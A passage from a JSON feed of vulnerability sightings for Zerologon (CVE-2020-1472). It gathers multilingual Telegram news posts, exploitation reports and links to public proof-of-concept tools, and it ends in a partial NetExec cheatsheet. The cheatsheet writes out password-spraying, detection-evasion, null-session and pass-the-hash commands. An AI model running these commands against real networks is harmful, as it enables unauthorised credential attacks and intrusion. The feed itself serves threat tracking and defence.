\u0627\u0633\u062a \u06a9\u0647 \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 \u067e\u0627\u062f\u0648\u06cc\u0634 \u0646\u06cc\u0632 \u062f\u0631 \u0628\u0631\u0631\u0633\u06cc \u0647\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0627\u0632 \u062a\u0627\u0631\u06cc\u062e 3 \u0622\u0628\u0627\u0646 \u0642\u0627\u062f\u0631 \u0628\u0647 \u062a\u0634\u062e\u06cc\u0635 \u062d\u0645\u0644\u0627\u062a ZeroLogon \u0627\u0633\u062a .\n\n\ud83d\udd3b \u0634\u0631\u06a9\u062a \u0645\u06a9\u0627\u0641\u06cc \u0628\u0639\u062f \u0627\u0632 76 \u0631\u0648\u0632 \u0627\u0632 \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc ZeroLogon - CVE-2020-1472  \u062f\u0631 \u0627\u0637\u0644\u0627\u0639\u06cc\u0647 \u0627\u06cc \u0627\u0639\u0644\u0627\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u067e\u0633 Exploit \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc \u06a9\u0646\u062f .\n\n\u269c\ufe0f\u269c\ufe0f  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\ufe0f\u269c\ufe0f\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2020-10-30T17:16:06.000000Z"}, {"uuid": "a4d6b9df-e8fc-4e3f-927a-15a40795039c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/6629", "content": "CVE-2020-1472\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-13T19:13:40.000000Z"}, {"uuid": "a09a6195-ccf6-4ae6-841a-9db7ce5acaeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/haccking/5487", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon: CVE-2020-1472\nhttps://telegra.ph/Uyazvimost-Zerologon-CVE-2020-1472-10-08", "creation_timestamp": "2020-10-09T14:00:14.000000Z"}, {"uuid": "7dd9ebdb-65ae-4f20-abca-4fe65c306493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/DC8044_Info/877", "content": "\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e CVE-2020-1472, aka ZeroLogon \u0434\u0435\u0442\u0435\u043a\u0442\u044f\u0442 \u043d\u0430 \u0445\u0430\u043d\u0438\u043f\u043e\u0442\u0430\u0445 in the wild.\nhttps://doublepulsar.com/in-the-wild-exploitation-of-zerologon-detected-over-the-internet-on-honeypot-f61e2700215b", "creation_timestamp": "2020-09-27T21:38:24.000000Z"}, {"uuid": "e1336b64-d15a-4be5-bd30-c1d1db504b41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/haccking/7070", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\nZeroLogon \u0432 Windows Server. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f CVE-2020-1472", "creation_timestamp": "2021-12-23T15:01:44.000000Z"}, {"uuid": "687e3207-3540-4df2-be93-15f3f52861be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SecLabNews/8895", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zerologon (CVE-2020-1472), \u0443\u0442\u043e\u0447\u043d\u0438\u0432 \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u043c\u0435\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Windows Server \u043e\u0442 \u0430\u0442\u0430\u043a, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.     \nMicrosoft\u00a0\u0440\u0430\u0437\u044a\u044f\u0441\u043d\u0438\u043b\u0430 \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zerologon", "creation_timestamp": "2020-10-06T07:09:51.000000Z"}, {"uuid": "4261ae9c-a42f-4f8d-9348-720e0895da11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SecLabNews/8962", "content": "\u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft, \u0438\u0440\u0430\u043d\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 MuddyWater (\u043e\u043d\u0430 \u0436\u0435 MERCURY, SeedWorm \u0438 TEMP.Zagros) \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0434\u0432\u0443\u0445 \u043d\u0435\u0434\u0435\u043b\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ZeroLogon (CVE-2020-1472).     \n\u0418\u0440\u0430\u043d\u0441\u043a\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ZeroLogon", "creation_timestamp": "2020-10-06T10:45:01.000000Z"}, {"uuid": "b57c9e01-88b4-48a3-b37e-cc9e6a548d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/DC8044_Info/902", "content": "\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0432 13 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e \u041a\u0438\u0435\u0432\u0443 \u0426\u0410\u0420\u041a\u0410 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u0432\u0435\u0431\u0438\u043d\u0430\u0440 \u0441 \u0440\u0430\u0437\u0431\u043e\u0440\u043e\u043c \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zerologon (CVE-2020-1472), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0434\u043e\u043c\u0435\u043d\u0430, \u0430 \u043e\u0442\u0442\u0443\u0434\u0430 - \u043a\u043e \u0432\u0441\u0435\u0439 \u0441\u0435\u0442\u0438. \u0420\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u0431\u0443\u0434\u0435\u0442 \u044d\u043a\u0441\u043f\u0435\u0440\u0442 \u0426\u0410\u0420\u041a\u0410 \u0422\u0443\u0440\u0441\u0443\u043c\u0431\u0430\u0435\u0432 \u0414\u0430\u043d\u0438\u043b (Wilson).\n\u0421\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u0432\u0435\u0431\u0438\u043d\u0430\u0440\u0430:\n- \u0440\u0435\u0436\u0438\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0431\u043b\u043e\u0447\u043d\u044b\u0445 \u0448\u0438\u0444\u0440\u043e\u0432;\n- \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zerologon;\n- \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438;\n- \u043b\u0438\u0447\u043d\u044b\u0439 \u043e\u043f\u044b\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u0436\u0438\u0432\u043e\u043c \u043f\u0440\u043e\u0435\u043a\u0442\u0435.\nhttps://youtu.be/eJ6L8f6Sw_U", "creation_timestamp": "2020-10-01T10:30:32.000000Z"}, {"uuid": "b32fcce4-7898-47e1-9715-c26378fcfd6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/Russian_OSINT/875", "content": "\u200b\u200b\ud83d\ude94 \u0424\u0411\u0420 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0441\u043f\u0438\u0441\u043e\u043a 30 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 2 \u0433\u043e\u0434\u0430\n\nCVE-2021-26855: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-26857: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-26858: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-27065: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-22893: It is an Improper Authentication vulnerability that is marked as critical\nCVE-2021-22894: It is a buffer overflow vulnerability that enables an attacker to execute arbitrary code\nCVE-2021-22899: It is a command injection vulnerability that enables an attacker to execute remote code\nCVE-2021-22900: It is an Improper Control of Generation of Code vulnerability\nCVE-2021-27101: It is an Improper Neutralization of Special Elements used in an SQL Command\nCVE-2021-27102: It is an Improper Neutralization of Special Elements used in an OS Command\nCVE-2021-27103: It is a Server-Side Request Forgery (SSRF) vulnerability\nCVE-2021-27104: It is an Improper Neutralization of Special Elements used in an OS Command vulnerability\nCVE-2021-21985: It is an Improper Input Validation vulnerability\nCVE-2018-13379: It is an Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\nCVE-2020-12812: It is an Improper Authentication vulnerability\nCVE-2019-5591: It is a Missing Authentication for Critical Function vulnerability\nCVE-2019-19781: It is an Improper Limitation of a Pathname to a Restricted Directory \nCVE 2019-11510: It is an Improper Limitation of a Pathname to a Restricted Directory\nCVE 2018-13379: It is an Improper Limitation of a Pathname to a Restricted Directory \nCVE 2020-5902: It is an Inclusion of Functionality from Untrusted Control Sphere and Improper Limitation of a Pathname to a Restricted Directory vulnerability \nCVE 2020-15505: It is an Insufficient Information vulnerability\nCVE-2017-11882: It is a Microsoft Office Memory Corruption vulnerability that enables an attacker to execute arbitrary code.\nCVE-2019-11580: It is an Insufficient Information vulnerability\nCVE-2018-7600: It is an Improper Input Validation vulnerability\nCVE 2019-18935: It is a Deserialization of Untrusted Data vulnerability\nCVE-2019-0604: It is a Microsoft SharePoint Remote Code Execution Vulnerability\nCVE-2020-0787: It is a Windows Background Intelligent Transfer Service Elevation of Privilege vulnerability\nCVE-2020-1472: It is a Netlogon Elevation of Privilege vulnerability \nCVE-2020-15505: It is an Insufficient Information vulnerability\nCVE-2020-0688: It is a Use of Hard-coded Credentials vulnerability", "creation_timestamp": "2021-07-29T17:59:02.000000Z"}, {"uuid": "f7d15627-945b-4597-a857-708beaa50492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1946", "content": "#DFIR\nThe DFIR Report - Ryuk in 5 Hours:\n- Zerologon (CVE-2020-1472) exploited 2 hours after initial execution of Bazar; \n- Cobalt Strike & Bazar for C2; \n- AdFind, Net, Ping, Nltest & PowerShell for Discovery; \n- WMI & RDP for Execution; \n- Ryuk ransomware for Impact.\nhttps://thedfirreport.com/2020/10/18/ryuk-in-5-hours", "creation_timestamp": "2022-11-27T19:23:41.000000Z"}, {"uuid": "acb2baad-6bf5-4afd-aa45-20d24c71e2d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2358", "content": "#Analytics\nTop-10 exploited vulnerabilities in July-December 2020:\n1. CVE-2020-0601 - CurveBall CryptoAPI\nhttps://t.me/cybersecuritytechnologies/628\n2. CVE-2019-17026/CVE-2020-0674 - 0-Day Vulnerability in Mozilla Firefox\nhttps://t.me/cybersecuritytechnologies/914\n3. CVE-2020-0796 - Windows SMBv3 LPE exploit\nhttps://t.me/cybersecuritytechnologies/874\n4. CVE-2020-1472 - Microsoft Zerologon\nhttps://t.me/cybersecuritytechnologies/1742\n5. CVE-2020-5902/5903 - F5 BigIP TMUI Critical RCE\nhttps://t.me/cybersecuritytechnologies/1378\n6. CVE-2018-10561 - Dasan GPON Router Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/51\n7. CVE-2020-1350 - Exploit SIGRed\nhttps://t.me/cybersecuritytechnologies/1422\n8. CVE-2020-15999 + CVE-2020-17087 = Win Kernel cng.sys buffer overflow 0-Day\nhttps://t.me/cybersecuritytechnologies/1960\nhttps://t.me/cybersecuritytechnologies/2010\n9. CVE-2020-16898 - \"Bad Neighbor\" RCE Vulnerability\nhttps://t.me/cybersecuritytechnologies/1912\n10. CVE-2020-1938 - \"Ghostcat\" Apache Tomcat\nhttps://t.me/cybersecuritytechnologies/705", "creation_timestamp": "2025-01-04T20:00:34.000000Z"}, {"uuid": "4d55db42-61dd-4e68-947c-169e955db3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1742", "content": "#exploit\nCVE-2020-1472: \nNetlogon (MS-NRPC) EoP Vulnerability\nhttps://www.secura.com/blog/zero-logon\n]-> test tool for CVE-2020-1472:\nhttps://github.com/SecuraBV/CVE-2020-1472\n]-> PoC for Zerologon:\nhttps://github.com/dirkjanm/CVE-2020-1472\n]-> Unauth Domain Controller compromise of the computer account password:\nhttps://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472", "creation_timestamp": "2024-10-28T16:04:45.000000Z"}, {"uuid": "e074e92d-d747-4d1c-a3c3-db331f533845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8709", "content": "#Blue_Team_Techniques\n1. Testing CVE-2022-44875\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n2. Test tool for CVE-2020-1472 (Zerologon)\nhttps://github.com/SecuraBV/CVE-2020-1472\n3. Tool for scanning/exploiting the famous SQL injection vulnerability in more than millions of sites\nhttps://github.com/mr-sami-x/SQLi", "creation_timestamp": "2025-03-29T16:32:29.000000Z"}, {"uuid": "c15a6514-56f2-4794-8bf9-798cb3260563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2708", "content": "#Analytics\n10 most exploited vulnerabilities of the week (feb 8-14)\nCVE-2020-1472 - Microsoft Zerologon\nhttps://t.me/cybersecuritytechnologies/1742\nCVE-2021-3156 - Heap-Based Buffer Overflow in Sudo\nhttps://t.me/cybersecuritytechnologies/2577\nCVE-2021-1732 - Windows kernel 0-day exploit is used by BITTER APT in targeted attack\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2020-2037 - Palo Alto PAN-OS vulnerability\nhttps://t.me/cybersecuritytechnologies/2687\nCVE-2021-24074, CVE-2021-24086, CVE-2021-24094 - Windows IPv4/IPv6 Stack RCE/DoS Vulnerabilities\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-1782 - iOS\\iPadOS 14.3 kernel LPE vulnerability\nhttps://t.me/cybersecuritytechnologies/2694\nCVE-2021-21017 - Acrobat Reader DC\u00a0a heap-based buffer overflow vulnerability\nhttps://threatpost.com/critical-adobe-windows-flaw/163789\nCVE-2020-24581 - D-Link DSL-2888A AU_2.31_V1x - RCE\nhttps://t.me/cybersecuritytechnologies/2670", "creation_timestamp": "2021-02-15T11:00:19.000000Z"}, {"uuid": "122a4960-8a62-457b-a3ea-f061ecf168d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cibsecurity/14936", "content": "\u274c Zerologon Attacks Against Microsoft DCs Snowball in a Week \u274c\n\nThe attempted compromises, which could allow full control over Active Directory identity services, are flying thick and fast just a week after active exploits of CVE-2020-1472 were first flagged.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2020-09-29T20:38:27.000000Z"}, {"uuid": "0d1aabff-c793-457c-8a0e-bdcda038bcf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/cibsecurity/14788", "content": "\ud83d\udd74 Patch by Tonight: CISA Issues Emergency Directive for Critical Netlogon Flaw \ud83d\udd74\n\nThe directive requires all federal agencies to apply a patch for Windows Netlogon vulnerability CVE-2020-1472 by midnight on Sept. 21.\n\n\ud83d\udcd6 Read\n\nvia \"Dark Reading: \".", "creation_timestamp": "2020-09-21T17:34:19.000000Z"}, {"uuid": "e6bde413-0869-4dc2-a5a7-0d0d9fb9c202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cibsecurity/15082", "content": "\u274c Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors \u274c\n\nMicrosoft warns that the MERCURY APT has been actively exploiting CVE-2020-1472 in campaigns for the past two weeks.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2020-10-06T18:20:48.000000Z"}, {"uuid": "90b1b0b4-edd4-42b1-b61a-399e08d0b903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/453274cf-e60d-452a-b88e-0bf6a5a6dae4", "content": "", "creation_timestamp": "2026-05-07T22:28:58.000000Z"}, {"uuid": "a0cb175a-aced-4629-b6c2-02c689bcd78b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/suboxone_chatroom/132", "content": "Both Falcon identity protection modules provide Active Directory attack detections:\n\u2022 Account enumeration reconnaissance (BloodHound, Kerberoasting)\n\u2022 Bronze Bit (CVE-2020-17049)\n\u2022 Brute force attacks (LDAP simple bind, NTLM, Kerberos)\n\u2022 Credential scanning (on-premises)\n\u2022 Cloud-based (Azure AD) brute-force/credentials scanning\n\u2022 DCSync \u2014 Active Directory replication\n\u2022 DCShadow\n\u2022 Forged PAC for privilege escalation (Bulletin MS-14-068)\n\u2022 Golden Ticket\n\u2022 Hidden object detected\n\u2022 NTLM Relay Attack (including MS Exchange)\n\u2022 Overpass-the-Hash (Multiple methods - Mimikatz, CrackMapExec)\n\u2022 Pass-the-Hash (Impacket, CrackMapExec, Metasploit)\n\u2022 Pass-the-Ticket\n\u2022 Possible exploitation attempt (CredSSP) CVE-2018-0886\n\u2022 Remote execution attempts\n\u2022 Skeleton Key and Mimikatz Skeleton Key\n\u2022 Suspected NTLM authentication tampering (CVE-2019-1040)\n\u2022 ZeroLogin (CVE-2020-1472)", "creation_timestamp": "2024-12-27T11:55:02.000000Z"}, {"uuid": "94253f7a-cee5-4247-8917-e506e103e14b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/14672", "content": "\ud83d\udd74 CISA Issues Alert for Microsoft Netlogon Vulnerability \ud83d\udd74\n\nCISA has issued an alert following the discovery of publicly available exploit code for Windows elevation of privilege flaw CVE-2020-1472.\n\n\ud83d\udcd6 Read\n\nvia \"Dark Reading: \".", "creation_timestamp": "2020-09-15T20:34:30.000000Z"}, {"uuid": "f764cd92-c7d8-4296-8b61-129ea195dafd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/GithubRedTeam/84953", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #NTLM Relay #AD #SMB\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a apex-predator\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a noemvex\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-10 21:00:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAdvanced AD Offensive Engine. Automates the path from stealthy recon to domain compromise. Features unauthenticated SMB Signing/NTLM Relay audits, ZeroLogon (CVE-2020-1472) hunting, and authenticated LAPS extraction. Engineered for Red Team precision with professional, executive-ready HTML reporting.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T08:05:48.000000Z"}, {"uuid": "d279821b-784b-4ebb-87b3-27bbd6888dfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key 